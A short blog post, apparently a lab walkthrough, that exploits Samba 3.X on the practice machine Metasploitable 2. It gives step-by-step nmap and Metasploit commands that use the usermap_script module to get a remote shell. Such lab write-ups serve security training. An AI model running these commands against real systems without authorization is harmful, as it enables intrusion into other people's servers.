Thursday, October 13, 2016

Pwning Metasploitable 2: Exploiting Samba smbd 3.X

Lets look at port 139 on our Metasploitable 2 machine

Discovering the port status and service


Enter the command: nmap -sV -p 139 <<target IP address>>



From the nmap results, we see that the port is open with Samba 3.X running on it. 

Samba is a freeware that allows users to access and read files, access printers and other resources over the network. It is based on the Server Message Block (SMB) protocol

Exploiting Samba


Start up your Metasploit framework using the command "msfconsole"

Search for Samba exploits with: search samba



There are many exploits for samba. Only 1 fits our needs. You can try out different exploits and see the results. 

Enter the command: use exploit/multi/samba/usermap_script
Enter the command: show options



RHOST field is empty. Lets give it the exploit a target.

Enter the command: set RHOST <<target IP address>>



and lastly, enter the command: exploit



Exploited successfully. We have our shell :)


Together with our previous articles, we have gotten multiple shells through vulnerable services. In our next article we will look at post-exploitation. The next step after getting a shell. 


-Jayesh Kerai (@secjay

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.